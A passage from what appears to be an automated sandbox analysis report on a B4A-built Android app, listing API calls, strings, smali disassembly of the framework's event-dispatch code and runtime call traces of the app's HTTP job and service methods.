                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Exception.<init>
                        • java.lang.ThreadLocal.set
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Exception.<init>
                        • java.lang.Throwable.getCause
                        • java.lang.System.out:Ljava/io/PrintStream
                        • java.io.PrintStream.println
                        • java.lang.ThreadLocal.set
                        • java.lang.Class.forName
                        • java.lang.Class.getDeclaredMethod
                        • java.lang.reflect.Method.invoke
                        • java.lang.Boolean.TRUE:Ljava/lang/Boolean
                        • java.lang.Boolean.equals
                        • java.lang.ThreadLocal.set
                        • java.lang.RuntimeException.<init>
                        • java.lang.Throwable.toString
                        • java.lang.RuntimeException.<init>
                        • java.lang.ThreadLocal.set
                        Strings
                        • ignoring event:
                        • Sub
                        • signature does not match expected signature.
                        • was not found.
                        • catching B4AUncaughtException
                        • anywheresoftware.b4a.objects.ServiceHelper$StarterHelper
                        • handleUncaughtException
                        Position Instruction Meta Information
                        1iget-object v0, p0, Lanywheresoftware/b4a/BA;->processBA:Lanywheresoftware/b4a/BA;
                        2if-eqz v0, :cond_e
                        3move-object v1, p1
                        4move v2, p2
                        5move-object v3, p3
                        6move v4, p4
                        7move-object v5, p5
                        9invoke-virtual/range {v0 .. v5}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        10move-result-object p1
                        11return-object p1
                        12cond_e:
                        13iget-object v0, p0, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        14iget-boolean v0, v0, Lanywheresoftware/b4a/BA$SharedProcessBA;->isActivityPaused:Z
                        15const/4 v1, 0x0
                        16if-eqz v0, :cond_2b
                        17if-nez p2, :cond_2b
                        19sget-object p1, Ljava/lang/System;->out:Ljava/io/PrintStream;
                        20new-instance p2, Ljava/lang/StringBuilder;
                        22const-string p4, "ignoring event: "
                        24invoke-direct {p2, p4}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        26invoke-virtual {p2, p3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        28invoke-virtual {p2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        29move-result-object p2
                        31invoke-virtual {p1, p2}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V
                        32return-object v1
                        33cond_2b: const/4 p2, 0x1
                        34try_start_2c:
                        35iget-object v0, p0, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        36iget v2, v0, Lanywheresoftware/b4a/BA$SharedProcessBA;->numberOfStackedEvents:I
                        37add-int/2addr v2, p2
                        38iput v2, v0, Lanywheresoftware/b4a/BA$SharedProcessBA;->numberOfStackedEvents:I
                        40sget-object v0, Lanywheresoftware/b4a/BA;->senderHolder:Ljava/lang/ThreadLocal;
                        42invoke-virtual {v0, p1}, Ljava/lang/ThreadLocal;->set(Ljava/lang/Object;)V
                        44iget-object v0, p0, Lanywheresoftware/b4a/BA;->waitForEvents:Ljava/util/HashMap;
                        45if-eqz v0, :cond_4f
                        47invoke-virtual {p0, p1, p3, p5}, Lanywheresoftware/b4a/BA;->checkAndRunWaitForEvent(Ljava/lang/Object;Ljava/lang/String;[Ljava/lang/Object;)Z
                        48move-result p1
                        49try_end_40: if-eqz p1, :cond_4f
                        51iget-object p1, p0, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        52iget p3, p1, Lanywheresoftware/b4a/BA$SharedProcessBA;->numberOfStackedEvents:I
                        53sub-int/2addr p3, p2
                        54iput p3, p1, Lanywheresoftware/b4a/BA$SharedProcessBA;->numberOfStackedEvents:I
                        56sget-object p1, Lanywheresoftware/b4a/BA;->senderHolder:Ljava/lang/ThreadLocal;
                        58invoke-virtual {p1, v1}, Ljava/lang/ThreadLocal;->set(Ljava/lang/Object;)V
                        59return-object v1
                        60try_start_4f:
                        61iget-object p1, p0, Lanywheresoftware/b4a/BA;->htSubs:Ljava/util/HashMap;
                        63invoke-virtual {p1, p3}, Ljava/util/HashMap;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        64move-result-object p1
                        65check-cast p1, Ljava/lang/reflect/Method;
                        66try_end_57:
                        67const-string v0, "Sub "
                        68if-eqz p1, :cond_85
                        69try_start_5b:
                        70iget-object p4, p0, Lanywheresoftware/b4a/BA;->eventsTarget:Ljava/lang/Object;
                        72invoke-virtual {p1, p4, p5}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        • Time: 686118
                          • This:
                            • public static java.lang.String com.MrXnxVip.global.starter._service_create() throws java.lang.Exception
                            • getName:_service_create
                          • p0: null
                          • p1: [Ljava.lang.Object;@4a13beb
                          • Return:
                            • ""
                        • Time: 689577
                          • This:
                            • public java.lang.String com.MrXnxVip.global.httpjob._class_globals() throws java.lang.Exception
                            • getName:_class_globals
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=null, vvvvvvvvv0=null, vvvvvvvvv1=null, vvvvvvvvv2=null, vvvvvvvvv3=null, vvvvvvvvv4=, vvvvvvvvv5=, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • p1: [Ljava.lang.Object;@50ead82
                          • Return:
                            • ""
                        • Time: 690661
                          • This:
                            • public static void com.MrXnxVip.global.firebasemessaging._service_start(anywheresoftware.b4a.objects.IntentWrapper) throws java.lang.Exception
                            • getName:_service_start
                          • p0: null
                          • p1: [Ljava.lang.Object;@e1883b7
                          • p1.Arrays.toString: [(Intent) Intent { cmp=com.MrXnxVip.global/.firebasemessaging }]
                          • Return:
                            • null
                        • Time: 690691
                          • This:
                            • public static java.lang.String com.MrXnxVip.global.main._globals() throws java.lang.Exception
                            • getName:_globals
                          • p0: null
                          • p1: null
                          • Return:
                            • ""
                        • Time: 695279
                          • This:
                            • public java.lang.String com.MrXnxVip.global.httpjob._class_globals() throws java.lang.Exception
                            • getName:_class_globals
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • p1: [Ljava.lang.Object;@ca2cc46
                          • Return:
                            • ""
                        • Time: 696030
                          • This:
                            • public java.lang.String com.MrXnxVip.global.httpjob._class_globals() throws java.lang.Exception
                            • getName:_class_globals
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@d7a1225, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@fb72808, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@92051c6, vvvvvvvvv3=java.lang.Object@e9abcb4, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • p1: [Ljava.lang.Object;@20cce95
                          • Return:
                            • ""
                        • Time: 824921
                          • This:
                            • public java.lang.String com.MrXnxVip.global.httpjob._class_globals() throws java.lang.Exception
                            • getName:_class_globals
                          • p0: com.MrXnxVip.global.httpjob@4606ada
                          • p1: [Ljava.lang.Object;@ceb9b30
                          • Return:
                            • ""
                        • Time: 824975
                          • This:
                            • public static boolean com.MrXnxVip.global.starter._application_error(anywheresoftware.b4a.objects.B4AException,java.lang.String) throws java.lang.Exception
                            • getName:_application_error
                          • p0: null
                          • p1: [Ljava.lang.Object;@1a47190
                          • p1.Arrays.toString: ?
                          • Return:
                            • true
                        73move-result-object p1
                        74try_end_61:
                        75iget-object p3, p0, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        76iget p4, p3, Lanywheresoftware/b4a/BA$SharedProcessBA;->numberOfStackedEvents:I
                        77sub-int/2addr p4, p2
                        78iput p4, p3, Lanywheresoftware/b4a/BA$SharedProcessBA;->numberOfStackedEvents:I
                        80sget-object p2, Lanywheresoftware/b4a/BA;->senderHolder:Ljava/lang/ThreadLocal;
                        82invoke-virtual {p2, v1}, Ljava/lang/ThreadLocal;->set(Ljava/lang/Object;)V
                        83return-object p1
                        84try_start_6e: new-instance p1, Ljava/lang/Exception;
                        85new-instance p4, Ljava/lang/StringBuilder;
                        87invoke-direct {p4, v0}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        89invoke-virtual {p4, p3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        91const-string p3, " signature does not match expected signature."
                        93invoke-virtual {p4, p3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        95invoke-virtual {p4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        96move-result-object p3
                        98invoke-direct {p1, p3}, Ljava/lang/Exception;-><init>(Ljava/lang/String;)V
                        99throw p1
                        100cond_85: if-nez p4, :cond_95
                        101goto_87:
                        102iget-object p1, p0, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        103iget p3, p1, Lanywheresoftware/b4a/BA$SharedProcessBA;->numberOfStackedEvents:I
                        104sub-int/2addr p3, p2
                        105iput p3, p1, Lanywheresoftware/b4a/BA$SharedProcessBA;->numberOfStackedEvents:I
                        107sget-object p1, Lanywheresoftware/b4a/BA;->senderHolder:Ljava/lang/ThreadLocal;
                        109invoke-virtual {p1, v1}, Ljava/lang/ThreadLocal;->set(Ljava/lang/Object;)V
                        110goto/16 :goto_138
                        111cond_95: new-instance p1, Ljava/lang/Exception;
                        112new-instance p4, Ljava/lang/StringBuilder;
                        114invoke-direct {p4, v0}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        116invoke-virtual {p4, p3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        118const-string p3, " was not found."
                        120invoke-virtual {p4, p3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        122invoke-virtual {p4}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        123move-result-object p3
                        125invoke-direct {p1, p3}, Ljava/lang/Exception;-><init>(Ljava/lang/String;)V
                        126throw p1
                        127try_end_ac: move-exception p1
                        128try_start_ad: instance-of p3, p1, Ljava/lang/reflect/InvocationTargetException;
                        129if-eqz p3, :cond_b5
                        131invoke-virtual {p1}, Ljava/lang/Throwable;->getCause()Ljava/lang/Throwable;
                        132move-result-object p1
                        133cond_b5: instance-of p3, p1, Lanywheresoftware/b4a/B4AUncaughtException;
                        134if-eqz p3, :cond_d6
                        136iget-object p3, p0, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        137iget p3, p3, Lanywheresoftware/b4a/BA$SharedProcessBA;->numberOfStackedEvents:I
                        138if-gt p3, p2, :cond_d3
                        140sget-object p1, Ljava/lang/System;->out:Ljava/io/PrintStream;
                        142const-string p3, "catching B4AUncaughtException"
                        144invoke-virtual {p1, p3}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V
                        145try_end_c6:
                        146iget-object p1, p0, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        147iget p3, p1, Lanywheresoftware/b4a/BA$SharedProcessBA;->numberOfStackedEvents:I
                        148sub-int/2addr p3, p2
                        149iput p3, p1, Lanywheresoftware/b4a/BA$SharedProcessBA;->numberOfStackedEvents:I
                        151sget-object p1, Lanywheresoftware/b4a/BA;->senderHolder:Ljava/lang/ThreadLocal;
                        153invoke-virtual {p1, v1}, Ljava/lang/ThreadLocal;->set(Ljava/lang/Object;)V
                        154return-object v1
                        155try_start_d3: check-cast p1, Lanywheresoftware/b4a/B4AUncaughtException;
                        156throw p1
                        157cond_d6: sget-boolean p3, Lanywheresoftware/b4a/BA;->debugMode:Z
                        158const/4 p4, 0x0
                        159if-eqz p3, :cond_dd
                        160const/4 p3, 0x0
                        161goto/16 :goto_de
                        162cond_dd: const/4 p3, 0x1
                        163goto_de:
                        164invoke-static {p1, p3}, Lanywheresoftware/b4a/BA;->printException(Ljava/lang/Throwable;Z)Ljava/lang/String;
                        165move-result-object p3
                        166sget-boolean p5, Lanywheresoftware/b4a/BA;->debugMode:Z
                        167try_end_e4: if-nez p5, :cond_125
                        168try_start_e6:
                        169const-string p5, "anywheresoftware.b4a.objects.ServiceHelper$StarterHelper"
                        171invoke-static {p5}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        • Time: 824964
                          • p0: anywheresoftware.b4a.objects.ServiceHelper$StarterHelper
                          • Return:
                            • class anywheresoftware.b4a.objects.ServiceHelper$StarterHelper
                            • getName: anywheresoftware.b4a.objects.ServiceHelper$StarterHelper
                        172move-result-object p5
                        174const-string v0, "handleUncaughtException"
                        175const/4 v2, 0x2
                        176new-array v3, v2, [Ljava/lang/Class;
                        177const-class v4, Ljava/lang/Throwable;
                        178aput-object v4, v3, p4
                        179const-class v4, Lanywheresoftware/b4a/BA;
                        180aput-object v4, v3, p2
                        182invoke-virtual {p5, v0, v3}, Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        • Time: 824965
                          • This:
                            • class anywheresoftware.b4a.objects.ServiceHelper$StarterHelper
                            • getName:anywheresoftware.b4a.objects.ServiceHelper$StarterHelper
                          • p0: handleUncaughtException
                          • p1: [Ljava.lang.Class;@75bf28c
                          • p1.Arrays.toString: [class java.lang.Throwable, class anywheresoftware.b4a.BA]
                          • Return:
                            • public static boolean anywheresoftware.b4a.objects.ServiceHelper$StarterHelper.handleUncaughtException(java.lang.Throwable,anywheresoftware.b4a.BA) throws java.lang.Exception
                            • getName: handleUncaughtException
                        183move-result-object p5
                        184new-array v0, v2, [Ljava/lang/Object;
                        185aput-object p1, v0, p4
                        186aput-object p0, v0, p2
                        188invoke-virtual {p5, v1, v0}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        189move-result-object p4
                        190check-cast p4, Ljava/lang/Boolean;
                        192sget-object p5, Ljava/lang/Boolean;->TRUE:Ljava/lang/Boolean;
                        194invoke-virtual {p5, p4}, Ljava/lang/Boolean;->equals(Ljava/lang/Object;)Z
                        195move-result p4
                        196try_end_10f: if-eqz p4, :cond_125
                        198iget-object p1, p0, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        199iget p3, p1, Lanywheresoftware/b4a/BA$SharedProcessBA;->numberOfStackedEvents:I
                        200sub-int/2addr p3, p2
                        201iput p3, p1, Lanywheresoftware/b4a/BA$SharedProcessBA;->numberOfStackedEvents:I
                        203sget-object p1, Lanywheresoftware/b4a/BA;->senderHolder:Ljava/lang/ThreadLocal;
                        205invoke-virtual {p1, v1}, Ljava/lang/ThreadLocal;->set(Ljava/lang/Object;)V
                        206return-object v1
                        207catch_11e: move-exception p1
                        208try_start_11f: new-instance p3, Ljava/lang/RuntimeException;
                        210invoke-direct {p3, p1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        211throw p3
                        212cond_125: instance-of p4, p1, Ljava/lang/Error;
                        213if-nez p4, :cond_13f
                        215iget-object p4, p0, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        217iget-object p4, p4, Lanywheresoftware/b4a/BA$SharedProcessBA;->activityBA:Ljava/lang/ref/WeakReference;
                        218if-eqz p4, :cond_139
                        220invoke-virtual {p1}, Ljava/lang/Throwable;->toString()Ljava/lang/String;
                        221move-result-object p1
                        223invoke-virtual {p0, p1, p3}, Lanywheresoftware/b4a/BA;->ShowErrorMsgbox(Ljava/lang/String;Ljava/lang/String;)V
                        224goto/16 :goto_87
                        225goto_138: return-object v1
                        226cond_139: new-instance p3, Ljava/lang/RuntimeException;
                        228invoke-direct {p3, p1}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        229throw p3
                        230cond_13f: check-cast p1, Ljava/lang/Error;
                        231throw p1
                        232catch_142: move-exception p1
                        233throw p1
                        234try_end_144: move-exception p1
                        236iget-object p3, p0, Lanywheresoftware/b4a/BA;->sharedProcessBA:Lanywheresoftware/b4a/BA$SharedProcessBA;
                        237iget p4, p3, Lanywheresoftware/b4a/BA$SharedProcessBA;->numberOfStackedEvents:I
                        238sub-int/2addr p4, p2
                        239iput p4, p3, Lanywheresoftware/b4a/BA$SharedProcessBA;->numberOfStackedEvents:I
                        241sget-object p2, Lanywheresoftware/b4a/BA;->senderHolder:Ljava/lang/ThreadLocal;
                        243invoke-virtual {p2, v1}, Ljava/lang/ThreadLocal;->set(Ljava/lang/Object;)V
                        244goto/16 :goto_153
                        245goto_152: throw p1
                        246goto_153: goto/16 :goto_152
                        APIs
                        • java.lang.String.toLowerCase
                        • java.lang.String.toLowerCase
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.content.Intent.getComponent
                        • android.content.ComponentName.getClassName
                        • java.lang.Class.forName
                        • java.lang.Class.getDeclaredField
                        • java.lang.reflect.Field.setAccessible
                        • java.lang.reflect.Field.get
                        • java.lang.Class.isAssignableFrom
                        • java.lang.Class.isAssignableFrom
                        • java.lang.Class.isAssignableFrom
                        • android.app.Application.sendBroadcast
                        • android.os.Handler.postDelayed
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • android.content.ComponentName.getClassName
                        • java.lang.String.toLowerCase
                        • java.lang.RuntimeException.<init>
                        Strings
                        • 2
                        • ht
                        • java.lang.String@2771ce9
                        • java.lang.String@b8d1c0f
                        • job1
                        • Object context is paused. Ignoring CallSubDelayed:
                        • ComponentName = null
                        • com.MrXnxVip.global.httputils2service
                        • com.MrXnxVip.global.main
                        • mostCurrent
                        • CallSubDelayed -
                        Position Instruction Meta Information
                        0try_start_0:
                        1iget-object v0, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$mine:Lanywheresoftware/b4a/BA;
                        3iget-object v1, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$Component:Ljava/lang/Object;
                        5invoke-static {v0, v1}, Lanywheresoftware/b4a/keywords/Common;->getComponentBA(Lanywheresoftware/b4a/BA;Ljava/lang/Object;)Lanywheresoftware/b4a/BA;
                        6move-result-object v0
                        8iget-object v1, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$mine:Lanywheresoftware/b4a/BA;
                        10iget-object v5, v1, Lanywheresoftware/b4a/BA;->eventsTarget:Ljava/lang/Object;
                        11if-eqz v0, :cond_42
                        13invoke-virtual {v0}, Lanywheresoftware/b4a/BA;->isActivityPaused()Z
                        • Time: 695466
                          • This:
                            • anywheresoftware.b4a.BA@eb7fd4
                          • Return:
                            • false
                        • Time: 700208
                          • This:
                            • anywheresoftware.b4a.BA@a854acb
                          • Return:
                            • true
                        14move-result v1
                        15if-eqz v1, :cond_15
                        16goto/16 :goto_42
                        17cond_15: sget-boolean v1, Lanywheresoftware/b4a/BA;->shellMode:Z
                        18if-eqz v1, :cond_2e
                        19const/4 v4, 0x0
                        20const/4 v1, 0x0
                        22iget-object v2, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$Sub:Ljava/lang/String;
                        24sget-object v3, Lanywheresoftware/b4a/BA;->cul:Ljava/util/Locale;
                        26invoke-virtual {v2, v3}, Ljava/lang/String;->toLowerCase(Ljava/util/Locale;)Ljava/lang/String;
                        27move-result-object v6
                        28const/4 v7, 0x0
                        30iget-object v8, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$Arguments:[Ljava/lang/Object;
                        31move-object v2, v0
                        32move-object v3, v5
                        33move v5, v1
                        35invoke-virtual/range {v2 .. v8}, Lanywheresoftware/b4a/BA;->raiseEventFromDifferentThread(Ljava/lang/Object;Ljava/lang/Object;ILjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        36goto/16 :goto_10f
                        37cond_2e: const/4 v4, 0x1
                        39iget-object v1, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$Sub:Ljava/lang/String;
                        41sget-object v2, Lanywheresoftware/b4a/BA;->cul:Ljava/util/Locale;
                        43invoke-virtual {v1, v2}, Ljava/lang/String;->toLowerCase(Ljava/util/Locale;)Ljava/lang/String;
                        44move-result-object v1
                        45const/4 v6, 0x0
                        47iget-object v7, p0, Lanywheresoftware/b4a/keywords/Common$12;->val$Arguments:[Ljava/lang/Object;
                        48move-object v2, v0
                        49move-object v3, v5
                        50move-object v5, v1
                        52invoke-virtual/range {v2 .. v7}, Lanywheresoftware/b4a/BA;->raiseEvent2(Ljava/lang/Object;ZLjava/lang/String;Z[Ljava/lang/Object;)Ljava/lang/Object;
                        • Time: 697273
                          • This:
                            • [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • java.lang.Class@d79d8b3
                            • getName: com.MrXnxVip.global.httpjob
                        • Time: 697274
                          • This:
                            • public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvv0
                            • getName:_vvvvvvvv0
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • ""
                        • Time: 697282
                          • This:
                            • public java.lang.String com.MrXnxVip.global.httpjob._vvvvvvvv2
                            • getName:_vvvvvvvv2
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • job1
                        • Time: 697291
                          • This:
                            • public boolean com.MrXnxVip.global.httpjob._vvvvvvvv3
                            • getName:_vvvvvvvv3
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • false
                        • Time: 697307
                          • This:
                            • public java.lang.Object com.MrXnxVip.global.httpjob._vvvvvvvv7
                            • getName:_vvvvvvvv7
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • class com.MrXnxVip.global.main
                            • getName: com.MrXnxVip.global.main
                        • Time: 697310
                          • This:
                            • public com.MrXnxVip.global.firebasemessaging com.MrXnxVip.global.httpjob._vvvvvvvvv0
                            • getName:_vvvvvvvvv0
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • null
                        • Time: 697317
                          • This:
                            • public anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest com.MrXnxVip.global.httpjob._vvvvvvvvv1
                            • getName:_vvvvvvvvv1
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117
                        • Time: 697325
                          • This:
                            • public anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse com.MrXnxVip.global.httpjob._vvvvvvvvv2
                            • getName:_vvvvvvvvv2
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed
                        • Time: 697328
                          • This:
                            • public java.lang.Object com.MrXnxVip.global.httpjob._vvvvvvvvv3
                            • getName:_vvvvvvvvv3
